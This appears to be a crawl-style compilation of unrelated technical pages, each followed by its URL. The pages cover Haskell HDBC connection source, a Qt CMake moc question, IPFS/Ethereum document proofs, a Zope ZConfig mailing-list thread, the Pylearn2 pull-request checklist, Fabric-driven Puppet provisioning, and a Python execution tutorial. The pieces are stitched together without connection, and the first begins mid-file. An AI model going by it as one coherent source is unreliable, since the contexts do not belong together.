    {- | Commit any pending data to the database. Required to make any
       changes take effect. -}
    commit :: conn -> IO ()

    {- | Roll back to the state the database was in prior to the last
       'commit' or 'rollback'. -}
    rollback :: conn -> IO ()

    {- | Execute an SQL string, which may contain multiple queries. This is
       intended for situations where you need to run DML or DDL queries and
       aren't interested in results. -}
    runRaw :: conn -> String -> IO ()
    runRaw conn sql =
        do sth <- prepare conn sql
           _ <- execute sth [] `finally` finish sth
           return ()

    {- | Execute a single SQL query. Returns the number of rows modified
       (see 'execute' for details). The second parameter is a list of
       replacement values, if any. -}
    run :: conn -> String -> [SqlValue] -> IO Integer

    {- | ... -}
    prepare :: conn -> String -> IO Statement

    {- | ... -}
    clone :: conn -> IO conn

    {- | ... -}
    hdbcDriverName :: conn -> String

    {- | ... -}
    hdbcClientVer :: conn -> String

    {- | In the case of a system such as ODBC, the name of the database
       client\/server in use, if available. For others, identical to
       'hdbcDriverName'. -}
    proxiedClientName :: conn -> String

    {- | In the case of a system such as ODBC, the version of the database
       client in use, if available. For others, identical to
       'hdbcClientVer'. This is the next layer out past the HDBC driver. -}
    proxiedClientVer :: conn -> String

    {- | The version of the database server, if available. -}
    dbServerVer :: conn -> String

    {- | ... -}
    dbTransactionSupport :: conn -> Bool

    {- | ... -}
    getTables :: conn -> IO [String]

    {- | ... -}
    describeTable :: conn -> String -> IO [(String, SqlColDesc)]

{- | ... -}
data ConnWrapper = forall conn. IConnection conn => ConnWrapper conn

{- | Unwrap a 'ConnWrapper' and pass the embedded 'IConnection' to a
   function.

   Example:

   >withWConn wrapped run $ "SELECT * from foo where bar = 1" []
-}
withWConn :: forall b. ConnWrapper -> (forall conn. IConnection conn => conn -> b) -> b
withWConn conn f =
    case conn of
         ConnWrapper x -> f x

instance IConnection ConnWrapper where
    disconnect w = withWConn w disconnect
    commit w = withWConn w commit
    rollback w = withWConn w rollback
    run w = withWConn w run
    prepare w = withWConn w prepare
    clone w = withWConn w (\dbh -> clone dbh >>= return . ConnWrapper)
    hdbcDriverName w = withWConn w hdbcDriverName
    hdbcClientVer w = withWConn w hdbcClientVer
    proxiedClientName w = withWConn w proxiedClientName
    proxiedClientVer w = withWConn w proxiedClientVer
    dbServerVer w = withWConn w dbServerVer
    dbTransactionSupport w = withWConn w dbTransactionSupport
    getTables w = withWConn w getTables
    describeTable w = withWConn w describeTable
http://hackage.haskell.org/package/HDBC-2.2.6/docs/src/Database-HDBC-Types.html
Set include path for Qt moc files using CMake
I'm trying to use CMake with Qt to deploy on Linux and Windows, but I can't manage to make a basic project architecture work, with a src and include directory. Here's an example:
.
├── CMakeLists.txt
├── include
│   └── LoginUI.hpp
└── src
    ├── login.ui
    ├── LoginUI.cpp
    └── main.cpp
Here's the content of my CMakeLists.txt
cmake_minimum_required(VERSION 2.8.11)
project(testproject)

set(SRCS src/main.cpp src/LoginUI.cpp)
set(INCLUDE_DIR include .)
set(HEADERS include/LoginUI.hpp)

if (UNIX)
    set(CMAKE_PREFIX_PATH "/opt/Qt5.9.2/5.9.2/gcc_64/lib/cmake")
endif (UNIX)

# Find includes in corresponding build directories
set(CMAKE_INCLUDE_CURRENT_DIR ON)
# Instruct CMake to run moc automatically when needed.
set(CMAKE_AUTOMOC ON)
set(CMAKE_AUTOUIC ON)

# Find the QtWidgets library
find_package(Qt5Widgets)

# Tell CMake to create the helloworld executable
add_executable(helloworld ${SRCS})
target_include_directories(helloworld PUBLIC ${INCLUDE_DIR})

# Use the Widgets module from Qt 5.
target_link_libraries(helloworld Qt5::Widgets)
When I run cmake, it works perfectly, but when I try to run 'make', there's an error showing that it searches for a header (here, LoginUI.hpp) in the 'src/' directory. I want it to search in the 'include/' directory. Is it possible?
Here's the exact error message :
[ 20%] Automatic moc and uic for target helloworld
AUTOGEN: error: .../src/LoginUI.cpp
The file includes the moc file "moc_LoginUI.cpp", but could not find header
"LoginUI{.h,.hh,.h++,.hm,.hpp,.hxx,.in,.txx}" in .../src/
Thanks for your answer, it worked nicely!
https://forum.qt.io/topic/84644/set-include-path-for-qt-moc-files-using-cmake
How can I use blockchain for storing proof of a document, such as an image?
Yes, you're right. Saving an entire image on Ethereum is very costly. I'd suggest you check out off-chain data stores like IPFS or Swarm (the Ethereum community usually recommends the latter).
Alternative APIs are also available; the two mentioned are popular services that most devs are using. Both are distributed off-chain storage systems.
I'd suggest you check the link below.
Coming to your question: this is an example of how to store a reference to an image, stored in IPFS, in an Ethereum smart contract.
pragma solidity ^0.4.24;

contract ImageInfo {

    mapping(address => Image[]) private images;

    struct Image {
        string imageHash;
        string ipfsInfo;
    }

    function uploadImage(string hash, string ipfs) public {
        images[msg.sender].push(Image(hash, ipfs));
    }
}
The above code is just for illustration. Modify the data structure as per your requirements. I have not added any security checks.
The idea is to first upload the image to IPFS/Swarm/any other off-chain data store, get back a reference, compute the hash of the image, and save both in the contract. To verify later, download the data (image) from the off-chain store, recompute its hash, and compare it against the hash saved in the contract.
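The client-side half of that flow (hashing at upload time, re-hashing at verification time) can be sketched in a few lines of Python. This is a hypothetical illustration, not part of the original answer; SHA-256 is assumed as the hash function.

```python
import hashlib


def image_hash(data):
    """Return a hex digest suitable for storing on-chain as the image hash."""
    return hashlib.sha256(data).hexdigest()


# At upload time: hash the image bytes and store (hash, ipfs_reference)
# in the smart contract alongside the off-chain location.
original = b"...image bytes..."
stored_hash = image_hash(original)

# At verification time: fetch the image from the off-chain store,
# recompute the hash and compare it with the one saved in the contract.
downloaded = b"...image bytes..."
assert image_hash(downloaded) == stored_hash
```

Only the small, fixed-size digest and reference live on-chain; the image itself never touches the blockchain.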
I feel like the above solution is one of the best ways to handle images, because all data is distributed using a serverless architecture.
If you are looking for a blockchain to store data in, then Bitcoin would not be a good choice. Ethereum or Hyperledger is ideal for developing such a POC (proof of concept). Or you can use the Elements blockchain platform, which is a feature experiment and an extension to the Bitcoin protocol. Here's the GitHub link you can refer to
https://www.edureka.co/community/2692/how-can-use-blockhain-for-storing-proof-document-such-image
Hi Stuart, Stuart Bishop wrote:
What were the problematic bits?
# Disgusting hack to use our extended config file schema rather than the
# Z3 one. TODO: Add command line options or other to Z3 to enable overriding
# this -- StuartBishop 20050406
from zdaemon.zdoptions import ZDOptions
ZDOptions.schemafile = os.path.abspath(os.path.join(
    os.path.dirname(__file__), 'lib', 'canonical', 'config', 'schema.xml'))

Also, there is only one schema.xml so multiple components can't each insert their own blob of configuration information into the global schema.
Okay, so I can see two potential problems here:

1. Zope 3's schema.xml has the same problem that Zope 2's used to have - no generic multisection where other frameworks/products/whatever can insert their own bits of configuration. I suspect fixing that schema.xml (which involves inserting one or two lines ;-) would remove the need for your monkeypatch above.
2. Are you aware of the component.xml stuff that Dieter referred to?
We lost a fair bit of flexibility doing it this way. Field validation needs to be done the ZConfig way.

How would you prefer to do it?

Validation of the entire config file, and if there are one or more errors, output a readable report at the end with error messages returned by the validators. The current mechanism just spits out exceptions, which is really bad for configuration files aimed at end users.
Agreed, this is something that could be added to ZConfig. Or Zope 3 could catch those exceptions and morph them into useful messages. Admittedly, you wouldn't get all the errors though, so ZConfig could do with some enhancement here...
If I have a non-required section foo, containing a non-required key bar, if I try and access config.foo.bar I get an AttributeError. I should get the default value for bar.
Okay, probably a bug. Have you reported this to the ZConfig author(s)?
My main gripe with the .ini format is the lack of hierarchy, but then I worry that with XML we'll suffer from an overly complex schema...

Why would you want a schema for the XML?
xml freaks like schemas ;-)

Although I actually probably should have said "I worry that we'll end up with overly complex and badly structured xml *cough*zcml*cough*...
- validation handlers would be registered for a particular XML namespace
...yay! we love namespaces *sigh*
- Config file is loaded into a set of data structures, one for each XML namespace
That's not a bad idea though...
- warnings are emitted if there are XML namespaces loaded that don't have a validator.
Why? If people don't want validators, don't force them...
Of course, .ini would be able to emit more meaningfull error messages: foo/bar/1 in section [whatever] is required, but not found blah/whatever in section [whatever] is not a valid url section [baz] is required but does not exist.
I'm all for just fixing the bugs in ZConfig and I think you'll be happy enough. Not sure it's worth the huge upheavals :-S
cheers, Chris -- Simplistix - Content Management, Zope & Python Consulting
https://www.mail-archive.com/zope3-dev@zope.org/msg04936.html
Pylearn2 Pull Request Checklist¶
Last updated: June 8, 2014
This is a preliminary list of common pull request fixes requested. It’s presumed that your pull request should already pass the Travis buildbot, including docstring and code formatting checks.
- Are you breaking a statement over multiple lines?
- Do tests exist for the code you’re modifying?
- Are you fixing a bug? Did you add a regression test?
- Are you fixing an issue that is on the issue tracker?
- Have you squashed out any nuisance commits?
- Are you using OrderedDict where necessary? Are you iterating over sets?
- Are you using print statements?
- Are you creating a sequence and then immediately iterating over it?
- Are you using zip()/izip() on sequences you expect to be the same length?
- Are you using the dict/OrderedDict methods keys()/values()/items()?
- Are you updating a dictionary or OrderedDict with .update()?
- Do you have an except: block?
- Are you checking to see if an argument is iterable?
- Are you checking if something is a string?
- Are you checking if something is a number?
- Are you creating Theano functions?
- Are you creating Theano shared variables?
- Are you casting symbols/constants to a Theano floating point type?
- Do you have big nested loops for generating a Cartesian product?
- Are you generating combinations or permutations of a set (or list, ...)?
- Are you overriding methods in your class?
- Are you writing functions that uses pseudo-random numbers?
- Are you assembling filesystem paths with dir + / + filename or similar?
- Are you extracting the directory name or base filename from a file path?
- Are you opening/closing files?
- Are you adding new files or changing files permissions?
Are you breaking a statement over multiple lines?¶
Python supports breaking a logical line over multiple file lines in a number of ways. One is to use backslashes before the line ending. Another is to enclose the broken section in parentheses () ([] also works, but you should only use this if you are otherwise creating a list). Note that if you have open parentheses from a function call you do not need additional parentheses.
In Pylearn2 we generally prefer parentheses, because it means there’s less markup to maintain and leads to fewer spurious errors.
Yes:
assert some_complicated_conditional_thing, (
    "This is the assertion error on a separate line."
)
No:
assert some_complicated_conditional_thing, \
    "This just gets annoying, especially if there are multiple " \
    "lines of text."
Note that string concatenation across lines is automatic, no need for +. If enclosed in parentheses you don’t need a backslash either:
# Valid Python.
print ("The quick brown fox jumps over the lazy dog. And then "
       "the fox did it again.")
See the PEP8 indentation recommendations for how to arrange indentation for continuation lines.
Do tests exist for the code you’re modifying?¶
Pylearn2 grew rapidly in the beginning, often without proper attention to testing. Modifying a piece of code in the codebase may alter how it works; if you make such a modification, you should not only verify that tests pass but that tests _exist_ for the piece of code you’re modifying. You should verify that those tests exist and update them as needed, including a test case for the behaviour you’re adding or modifying.
Usually tests for a module foo are found in tests/test_foo.py.
Are you fixing a bug? Did you add a regression test?¶
Tests that test for previously existing bugs are particularly critical, as further modification of the code may reintroduce the bug by those who are not aware of the subtleties that led to it in the first place.
Are you fixing an issue that is on the issue tracker?¶
Your pull request description (or a commit message for one of the commits) should include one of the supported variants of the syntax so that the issue is auto-closed upon merge.
Have you squashed out any nuisance commits?¶
Pull requests with lots and lots of tiny commits are hard to review. Lots of commits that subsequently introduce minor bugs and then fix them can also make bisecting a pain.
Your final pull request should comprise as few commits as logically make sense. Each commit should ideally leave the repository in a working state (tests passing, functionality preserved).
You can squash commits using git rebase -i and following the instructions. Note that you will have to git push --force origin my_branch_name after a rebase.
You should squash to a minimal set of semantically distinct commits before asking for a review, and then possibly squash again if you’ve made lots of commits in response to feedback (note that you can reorder the commits in the editor window given by git rebase -i).
Are you using OrderedDict where necessary? Are you iterating over sets?¶
The order of iteration over dictionaries in Python is not guaranteed to remain the same across different invocations of the same program. This is a result of a randomized hashing algorithm and is actually an important security feature for preventing certain kinds of Denial-of-Service attacks. Unfortunately, where such data structures are employed in scientific simulations, this can pose reproducibility problems.
The main reason for this is that computations in floating point do not precisely obey the typical laws of arithmetic (commutativity, associativity, distributivity), and slight differences in the order of operations can introduce small differences in result, which can have butterfly effects that significantly alter the results of a long-running job. The order of operations can be altered by the order in which a Theano graph is assembled, and the precise form it takes can unfortunately sometimes alter which compile-time graph optimizations are performed.
In order to stamp out inconsistencies introduced by an unpredictable iteration order, we make extensive use of the OrderedDict class. This class is part of the collections module in Python 2.7 and Python 3.x, however, in order to maintain Python 2.6 compatibility, we import it from theano.compat.python2x, which provides an equivalent pure-Python implementation if the built-in version is not available.
You should consider carefully whether the iteration order over a dictionary you’re using could result in different behaviour. If in doubt, use an OrderedDict. For the updates parameter when creating Theano functions, you _must_ use an OrderedDict, or a list of (shared_variable, update_expression) tuples.
When iterating over sets, consider whether you should first sort your set. The sorted() built-in function is a simple way of doing this.
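As a small illustration of the advice above (the variable names here are made up for the example, not taken from Pylearn2):

```python
from collections import OrderedDict

# Iterating over a plain set has no guaranteed order across runs, so sort
# first whenever the iteration order can affect results.
params = {"weights", "biases", "gamma"}
visited = []
for name in sorted(params):
    visited.append(name)  # always visits parameters in the same order
assert visited == ["biases", "gamma", "weights"]

# For mappings whose iteration order matters (e.g. Theano updates),
# OrderedDict preserves insertion order across runs.
updates = OrderedDict()
updates["w"] = 0.1
updates["b"] = 0.2
assert list(updates.keys()) == ["w", "b"]
```
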
Are you using print statements?¶
In most cases you should be using logging statements instead. You can initialize a logger in a new module with:
import logging
log = logging.getLogger(__name__)
And subsequently call into it with log.info(), log.warning(), etc.
Are you creating a sequence and then immediately iterating over it?¶
If so, consider using the faster and more memory efficient versions.
- xrange instead of range.
- from theano.compat.six.moves import zip as izip instead of zip. This import is for Python 3 compatibility.
Are you using zip()/izip() on sequences you expect to be the same length?¶
Note that zip and izip truncate the sequence of tuples they produce to the length of the shortest input sequence. If you expect, as is often the case, that the sequences you are zipping together should be the same length, use safe_zip or safe_izip defined in pylearn2.utils.
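The idea behind safe_zip can be shown in a few lines. This is a minimal sketch of the concept, not the actual pylearn2.utils implementation, which may differ in details:

```python
def safe_zip(*sequences):
    """zip() that raises instead of silently truncating.

    Sketch of the idea behind pylearn2.utils.safe_zip.
    """
    lengths = [len(seq) for seq in sequences]
    if len(set(lengths)) > 1:
        raise ValueError("sequences have unequal lengths: %s" % lengths)
    return zip(*sequences)


pairs = list(safe_zip([1, 2, 3], ["a", "b", "c"]))  # equal lengths: fine

caught = False
try:
    safe_zip([1, 2, 3], ["a", "b"])  # unequal lengths: error, not truncation
except ValueError:
    caught = True
```

Plain zip would silently return two pairs in the second call; safe_zip turns the length mismatch into a loud error.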
Also see itertools.izip_longest if you want to zip together sequences of unequal length with a fill value.
Are you using the dict/OrderedDict methods keys()/values()/items()?¶
For values() and items() consider whether itervalues() or iteritems() would be more appropriate, if you’re only iterating over them once, not keeping the result around for any length of time, and don’t need random access.
Also, don’t bother with keys() or iterkeys() at all if you’re just going to iterate over it. for k in my_dictionary iterates over keys by default.
An exception to these rules is if you are _modifying_ the dictionary within the loop. Then you probably want to duplicate things with the keys(), values() and items() calls.
Are you updating a dictionary or OrderedDict with .update()?¶
If you are using the update() method of a dictionary or OrderedDict and you expect that none of the keys in the argument should already be in the dictionary, use safe_update() defined in pylearn2.utils.
Do you have an except: block?¶
You should almost never have a bare except: in library code. Use:
except Exception:
    ...
instead. This catches any subclass of Exception but lets through certain low-level exceptions like KeyboardInterrupt, SystemExit, etc. that inherit from BaseException instead. You almost certainly do not want your code to catch these.
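The exception hierarchy makes this behaviour easy to verify directly:

```python
# KeyboardInterrupt and SystemExit derive from BaseException rather than
# Exception, so an "except Exception" block does not swallow them.
assert not issubclass(KeyboardInterrupt, Exception)
assert not issubclass(SystemExit, Exception)
assert issubclass(KeyboardInterrupt, BaseException)

handled = False
try:
    raise ValueError("ordinary error")
except Exception:  # catches ValueError; would let KeyboardInterrupt through
    handled = True
```
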
Don’t raise a new exception, use the reraise_as method from pylearn2.utils.exc instead.:
except Exception:
    reraise_as(ValueError("Informative error message here"))
This retains the traceback and original error message, allowing for easier debugging using a tool like pdb.
Are you checking to see if an argument is iterable?¶
In places where a list, tuple, or other iterable object (say, a deque) will suffice, use pylearn2.utils.is_iterable.
Are you checking if something is a string?¶
Unless you have a very good reason you should probably be using isinstance(foo, basestring) which correctly handles both str and unicode instances.
Are you checking if something is a number?¶
Usually such checks are unnecessary but where they might be, we’ve defined some helpful constants.
Are you checking if something is _any_ kind of number?¶
Use isinstance(foo, pylearn2.utils.py_number_types). This checks against Python builtins as well as NumPy-defined numerical types.
Are you checking if something is an integer?¶
Use isinstance(foo, pylearn2.utils.py_integer_types). This checks against Python builtins as well as NumPy-defined integer types.
Are you checking if something is a float?¶
First, ask yourself: do you really need to? Would passing an integer here be inappropriate in all circumstances? Would a cast (i.e., would float() be sufficient)?
If you really need to, use isinstance(foo, pylearn2.utils.py_float_types). This checks against Python builtins as well as NumPy-defined float types.
Are you checking if something is a complex number?¶
Again, ask yourself whether passing a real here would be an error, and whether you can get away with a cast.
If you really need to, use isinstance(foo, pylearn2.utils.py_complex_types). This checks against Python builtins as well as NumPy-defined complex types.
Are you checking for the presence of np.nan or np.inf in an array?¶
If so, use pylearn2.utils.contains_nan or pylearn2.utils.contains_inf. To check for either np.nan or np.inf, use pylearn2.utils.isfinite. These functions are faster and more memory efficient than np.any(np.isnan(X)) or np.any(np.isinf(X)).
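For intuition, here is a pure-Python analogue of what these helpers check. The real Pylearn2 functions operate on NumPy arrays; this sketch works on plain sequences of floats and is not the actual implementation:

```python
import math


def contains_nan(xs):
    """True if any element is NaN (sketch of the array version)."""
    return any(math.isnan(x) for x in xs)


def contains_inf(xs):
    """True if any element is +/- infinity."""
    return any(math.isinf(x) for x in xs)


def isfinite(xs):
    """True only when no element is NaN or infinite."""
    return not contains_nan(xs) and not contains_inf(xs)


assert isfinite([0.0, 1.5, -2.0])
assert contains_nan([0.0, float("nan")])
assert contains_inf([float("inf"), 1.0])
```
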
Are you creating Theano functions?¶
If you’re building Theano functions, use pylearn2.utils.function. This disables the on_unused_input check, which in most cases you don’t want to consider an error if you’re doing any kind of generic graph building.
Are you casting symbols/constants to a Theano floating point type?¶
Use pylearn2.utils.as_floatX to cast symbolic quantities to the default floating point type, and use constantX to create symbolic constants from a scalar or ndarray with the dtype specified in theano.config.floatX.
Do you have big nested loops for generating a Cartesian product?¶
Example:
stuff = []
for i in range(50):
    for j in range(20):
        for k in range(30):
            stuff.append((i, j, k))
Consider whether itertools.product will get the job done more readably and probably more efficiently.
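The triple loop above collapses to a single call:

```python
from itertools import product

# Equivalent to the nested loops above, without the nesting.
stuff = list(product(range(50), range(20), range(30)))

assert len(stuff) == 50 * 20 * 30
assert stuff[0] == (0, 0, 0)
assert stuff[-1] == (49, 19, 29)
```

product also returns a lazy iterator, so you can iterate over the Cartesian product without materializing it at all.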
Are you generating combinations or permutations of a set (or list, ...)?¶
itertools contains the functions permutations, combinations and combinations_with_replacement that will probably get the job done more efficiently than your own code.
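For example:

```python
from itertools import combinations, permutations

# All 2-element combinations, in lexicographic order of the input.
assert list(combinations([1, 2, 3], 2)) == [(1, 2), (1, 3), (2, 3)]

# 3! = 6 orderings of three elements.
assert len(list(permutations("abc"))) == 6
```
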
Are you overriding methods in your class?¶
Use the decorator pylearn2.utils.wraps to inherit the docstring if it is unchanged. If you add a docstring to a function that is wrapped in this fashion, it will be appended below the inherited docstring.
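The inherit-then-append behaviour can be mimicked with functools. This is a toy sketch of the idea, not the pylearn2.utils.wraps implementation:

```python
import functools


def wraps_with_doc(wrapped):
    """Toy decorator: inherit the wrapped function's docstring and append
    the overriding function's own docstring below it."""
    def decorator(f):
        inherited = wrapped.__doc__ or ""
        own = f.__doc__ or ""
        f = functools.wraps(wrapped)(f)
        f.__doc__ = (inherited + "\n\n" + own).strip()
        return f
    return decorator


def base():
    """Base docs."""


@wraps_with_doc(base)
def override():
    """Extra docs."""


assert override.__doc__ == "Base docs.\n\nExtra docs."
```
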
Are you writing functions that uses pseudo-random numbers?¶
If you are using the NumPy generator, are you providing a way to seed it as well as a default seed? You should never be using numpy.random functions directly. Use pylearn2.utils.rng.make_np_rng with a user-provided seed and a default_seed argument.
If you are using the Theano RNG you should create it similarly with pylearn2.utils.rng.make_theano_rng.
Are you assembling filesystem paths with dir + / + filename or similar?¶
Use os.path.join rather than concatenating together with ‘/’. This ensures the code still works on Windows.
Are you extracting the directory name or base filename from a file path?¶
Use os.path.basename and os.path.dirname to ensure Windows compatibility.
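Both points in one short example (the path components here are invented for illustration):

```python
import os.path

# os.path.join inserts the separator appropriate for the current OS.
path = os.path.join("data", "models", "best.pkl")

# Splitting the path back apart is equally portable.
assert os.path.basename(path) == "best.pkl"
assert os.path.dirname(path) == os.path.join("data", "models")
```
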
Are you opening/closing files?¶
Use the with statement, i.e.:
with open(fname, 'w') as f:
    f.write('blah blah blah')
This is cleaner and ensures that the file always gets closed, even in an error condition.
Are you adding new files or changing files permissions?¶
The files containing unit tests (named test_....py) should never be executable, otherwise nose will ignore them, and not execute the tests.
http://deeplearning.net/software/pylearn2/internal/pull_request_checklist.html
Using Fabric to apply Puppet scripts
On my current client project, in terms of managing configuration of the various environments, I have separated things into two problem spaces – provisioning hosts, and configuring hosts. Part of the reason for this separation is that although targeting AWS, we do need to allow us to support alternative services in the future, but I also consider the type of tasks to be rather different and to require different types of tools.
For provisioning hosts I am using the Python AWS API Boto. For configuring the hosts once provisioned, I am using Puppet. I remain unconvinced as to the relative merits of PuppetMaster or Chef Server (see my previous post on the subject) and so have decided to stick with using PuppetSolo so I can manage versioning how I would like. This leaves me with a challenge – how do I apply the puppet configuration for the hosts once provisioned with Boto? I also wanted to provide a relatively uniform command-line interface to the development team for other tasks like running builds etc. Some people use cron-based polling for this, but I wanted a more direct form of control. I also wanted to avoid the need to run any additional infrastructure, so mcollective was never something I was particularly interested in.
After a brief review of my “Things I should look at later” list it looked like time to give Fabric a play.
Fabric is a Python-based tool/library which excels at creating command-line tools for machine management. It’s bread and butter is script-based automation of machines via SSH – many people in fact use hand-rolled scripts on top of Fabric as an alternative to systems like Chef and Puppet. The documentation is very good, and I can heartily recommend the Fabric tutorial.
The workflow I wanted was simple. I wanted to be able to checkout a specific version of code locally, run one command to bring up a host and also apply a given configuration set. My potentially naive solution to this problem is to simply tar up my puppet scripts, upload them, and then run puppet. Here is the basic script:
[python]
@task
def provision_box():
    public_dns = provision_using_boto()
    local("tar cfz /tmp/end-bundle.tgz path/to/puppet_scripts/*")
    with settings(host_string=public_dns, user="ec2-user",
                  key_filename="path/to/private_key.pem"):
        run("sudo yum install -y puppet")
        put("/tmp/end-bundle.tgz", ".")
        run("tar xf end-bundle.tgz && "
            "sudo puppet --modulepath=/home/ec2-user/path/to/puppet_scripts/modules "
            "path/to/puppet_scripts/manifests/myscript.pp")
[/python]
The provision_using_boto() command is an exercise left to the reader, but the documentation should point you in the right direction. If you stuck the above command in your fabfile.py, all you need to do is run fab provision_box to do the work. The first yum install command is there to handle bootstrapping of puppet (as it is not on the AMIs we are using) - this will be a noop if the target host already has it installed.
This example is much more simplified than the actual scripts as we have also implemented some logic to re-use ec2 instances to save time & money, and also a simplistic role system to manage different classes of machines. I may write up those ideas in a future post.
https://blog.magpiebrain.com/blog/page/2/
There are 3 main ways to execute a python script.
1) Interactive Prompt
2) IDE (Python script)
3) Command Line (Python script)
*How you execute the code also depends on the version. Code written for Python 2.x may not always execute without traceback errors in Python 3.x. So the syntax is not always the same, nor does it always import the same modules. If you're not sure how to find your version, check here. The differences between the two versions can be found here. You may also have to change your IDE's settings to select a different Python version from the default, if you have multiple Python versions installed.
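A quick way to check the version from within Python itself, regardless of how you launched it:

```python
import sys

# Shows the interpreter version, e.g. (3, 8, 10, 'final', 0).
print(sys.version_info)

major = sys.version_info[0]
if major >= 3:
    message = "running under Python 3"
else:
    message = "running under Python 2"
```

This works identically at the interactive prompt, in an IDE, or from the command line.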
Interactive Prompt
This is mostly used for experimenting and testing. Although you can write out long code here, you should switch over to a file if you plan to write more than 3-5 lines; an IDE or file would be more appropriate and easier. The >>> is the prompt for interactive mode. What you type here is Python code. Unlike the other methods of executing Python, it will be executed right after you hit Enter, upon each line. The only time it does not execute after Enter (or each line) is when you are defining a function, class, or loop, for example. The ... will indicate that you are inside the block of what you are defining. (Some IDEs do not have the ..., in which case it is advised to find a different IDE.) Once you finish writing the code inside the block, you must hit Enter twice, where it will execute and take you back to the >>> prompt, depending on what you are defining.
The reason the interactive prompt is for testing is because:
1) it executes after each line, or after the definition of a loop, class, function, etc.
2) once you exit the interactive prompt, the code you wrote in it is gone. There is no saving the code.
The other two methods of executing python code will save a file with your code in it.
Windows
Adding Python to the PATH environment variable: this lets you execute python from any directory and run a Python script anywhere. If you plan on just putting the .py file in the installation path, you can skip this.
In Windows 7 or earlier, click on the Start Menu and (in search) type: "command prompt". A black "cmd" or "Command Prompt" icon will show up; opening c:\Windows\system32\cmd.exe does the same. In Windows 8, just type "cmd" at the Start screen, which enables search and pulls up the command console icon. This is a DOS prompt. You can do everything you can do normally on the PC in this DOS prompt with commands. The text before your cursor is the directory you are currently in. The command "cd" changes your current directory to the one named after it, and the command "dir" lists the contents of the directory you are in. Python should be in the directory C:\PythonXX (where XX represents the version you have downloaded). Once in that directory, type "python" to start the interactive prompt.
UPDATE:
The default install path from python3.5 and on has been changed from
- Code: Select all
C:\Python3.X
to
- Code: Select all
C:\Users\username\AppData\Local\Programs\Python\Python3X-XX
where Python35-32 means Python 3.5 for 32-bit, etc. If you are using this or a later version, change the path accordingly for this tutorial, unless you changed the default path upon installation.
- Code: Select all
C:\Windows\system32>cd c:\Python32
C:\Python32>python
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 ...
Type "help", "copyright", "credits" or "license" for more information.
>>>
If you see ">>>", then you are in the Python interactive prompt.
However, at this point the python command only works from the directory C:\Python32.
Are you getting this Error?
- Code: Select all
python is not recognized as an internal or external command,
operable program or batch file.
The next step makes the Python executable runnable from anywhere, not any script: if a script lives in a different directory than the one you are in, you still need to change to that directory, or give the full path of the file, to execute it.
To make python execute in any directory in Windows, you have to add Python to the PATH environment variable. To get there:
[Windows 7] My Computer (right-click) > Properties > Advanced System Settings > Environment Variables > under System Variables > double click Path > append the Python directory path to this, separated by semicolons (see below). Click OK on all the windows you have open.
[Windows 8] Go to Metro or Start and just type "Advanced System Settings" > Environment Variables > under System Variables > double click Path > append the Python directory path to this, separated by semicolons (see below). Click OK on all the windows you have open.
Youtube screencast
For the example above using Python32: in Environment Variables there is a Path variable already.
I changed the Path variable from:
- Code: Select all
%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
to
- Code: Select all
%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Python32
So I appended to the variable:
- Code: Select all
;C:\Python32
After that, OK out of all those windows, kill the command console, and open a fresh one the same way you did before. This time you will notice that you can change into any directory and the command python will pull up the interpreter – an easy indicator that you were successful.
an example output:
before setting the path:
- Code: Select all
C:\Users\metulburr>python
'python' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\metulburr>cd Python32
C:\Users\metulburr\Python32>python
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
C:\Users\metulburr\Python32>cd ..
C:\Users\metulburr>python
'python' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\metulburr>
refresh the console
after setting the path:
- Code: Select all
C:\Users\metulburr>python
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
C:\Users\metulburr>cd C:\
C:\>python
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
C:\>
To do that from the command prompt instead (this lasts only for the current console session):
- Code: Select all
set PATH=%PATH%;C:\My_python_lib
Linux
Open a Terminal; it does not matter what directory you are in. If you have both Python 2.x and Python 3.x installed, you can choose either interactive prompt by number. "python" is your OS default, which in some distros (currently Gentoo and Arch) may be Python 3.x.
python2.x
- Code: Select all
metulburr@ubuntu:~$ python
Python 2.7.3 (default, Aug 1 2012, 05:14:39)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
python3.x
- Code: Select all
metulburr@ubuntu:~$ python3
Python 3.2.3 (default, May 3 2012, 15:51:42)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
Depending on your Linux distro, and as more distros adopt Python 3.x as the default in the coming years, "python" may refer to 3.x and "python2" to 2.x.
IDE
An IDE is just a fancy text editor. That's it. It does not perform magic tricks, and you can accomplish the same without ever installing an IDE; see Command Line / Terminal below, which does just that. At its bare bones, an IDE just creates a file, puts your text in that file, and gives you a button to execute it. There are numerous IDEs, and the only difference is preference. Some are free and some are not, but the paid ones usually offer a free version that will work.
Each IDE differs in how you configure it, execute code, etc. Some have a Run command, an F-key, Ctrl+B, etc. to execute the Python code. Some will open a terminal/console for the output, some have embedded terminals, and some have their own area for output. Some offer all of these options, some only a few. All IDEs can be re-configured to your liking. For example: if you don't like that F5 runs your code, you can change the keybinding to Ctrl+B, or vice-versa. If you want an embedded terminal and the IDE doesn't have one by default, chances are there is a plugin for it. And so on.
What is IDLE? IDLE is just one of the numerous IDEs. Just because Python on Windows comes with IDLE does not mean Python needs IDLE to run; it is there for beginners' convenience. By most programmers it is also considered one of the worst IDEs, though it is fine for beginners. You can research why with a Google search later, or run across the reasons yourself as you progress in programming. For those who stick with IDLE: IDLE starts you off with the Python interpreter. This is not a command line! It is just a GUI form of the Python interpreter that you can also get in the command line/terminal. It confuses a lot of beginners because they click New Window, write their code, and run it, thinking the interpreter window is a command line or terminal. File -> New Window creates an empty file in the same way that Notepad does, and Run -> Run Module executes that code. The output of the code (at least in IDLE) is displayed in the Python interpreter ('>>>') as opposed to a terminal. The Python interpreter is there for quick one-liner tests here and there, not to run the code you saved in the new window.
